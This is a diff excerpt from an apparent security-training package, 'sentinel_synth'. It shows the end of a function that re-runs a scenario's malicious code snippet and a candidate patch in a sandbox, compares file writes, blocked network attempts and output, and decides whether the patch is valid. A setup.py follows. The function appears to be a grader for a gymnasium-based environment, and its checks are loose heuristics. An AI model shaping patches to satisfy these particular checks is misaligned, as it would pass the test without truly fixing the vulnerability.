# 3. Re-attack (Vulnerability Verification)
|
| 51 |
+
if scenario["type"] == "true_positive" and scenario.get("attack_type"):
|
| 52 |
+
# Run original code snippet to get baseline malicious behavior
|
| 53 |
+
attack_result = run_code(scenario["code_snippet"], timeout_sec=5, use_docker=use_docker)
|
| 54 |
+
|
| 55 |
+
# Run patched code
|
| 56 |
+
patch_result = run_code(patch_code, timeout_sec=5, use_docker=use_docker)
|
| 57 |
+
|
| 58 |
+
vulnerability_remains = False
|
| 59 |
+
|
| 60 |
+
# Generic heuristic: Did the patch reduce suspicious side-effects?
|
| 61 |
+
# 1. Compare file writes (malicious often creates/modifies files)
|
| 62 |
+
if len(patch_result.get("file_writes", [])) >= len(attack_result.get("file_writes", [])) and len(attack_result.get("file_writes", [])) > 0:
|
| 63 |
+
# Basic check: if attack result has file writes and patch still has them or more
|
| 64 |
+
vulnerability_remains = True
|
| 65 |
+
|
| 66 |
+
# 2. Compare network attempts (if telemetry includes it)
|
| 67 |
+
if patch_result.get("network_blocked") and attack_result.get("network_blocked"):
|
| 68 |
+
vulnerability_remains = True
|
| 69 |
+
|
| 70 |
+
# 3. Specific attack type checks (refined)
|
| 71 |
+
if scenario["attack_type"] == "typosquatting":
|
| 72 |
+
if "ImportError" in patch_result["stderr"] and "pythonn" in patch_result["stderr"]:
|
| 73 |
+
vulnerability_remains = True
|
| 74 |
+
elif scenario["attack_type"] == "obfuscated_exec":
|
| 75 |
+
# If the patch still produces the same specific output as the obfuscated one
|
| 76 |
+
if attack_result["stdout"].strip() != "" and patch_result["stdout"] == attack_result["stdout"]:
|
| 77 |
+
vulnerability_remains = True
|
| 78 |
+
|
| 79 |
+
if vulnerability_remains:
|
| 80 |
+
details["evidence"] = {
|
| 81 |
+
"attack_telemetry": attack_result,
|
| 82 |
+
"patch_telemetry": patch_result
|
| 83 |
+
}
|
| 84 |
+
return False, "Vulnerability still accessible", details
|
| 85 |
+
|
| 86 |
+
details["validation_log"] = "All checks passed successfully."
|
| 87 |
+
return True, "Patch is valid", details
|
setup.py
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
from setuptools import setup, find_packages
|
| 2 |
+
|
| 3 |
+
setup(
|
| 4 |
+
name="sentinel_synth",
|
| 5 |
+
version="0.1.0",
|
| 6 |
+
packages=find_packages(),
|
| 7 |
+
install_requires=[
|
| 8 |
+
"gymnasium>=0.29.0",
|
| 9 |
+
"docker>=7.0.0",
|
| 10 |
+
"streamlit>=1.30.0",
|
| 11 |
+
"wandb>=0.16.0",
|
| 12 |
+
"pytest>=8.0.0",
|
| 13 |
+
"synthetic-data-kit>=0.1.0"
|
| 14 |
+
]
|
| 15 |
+
)
|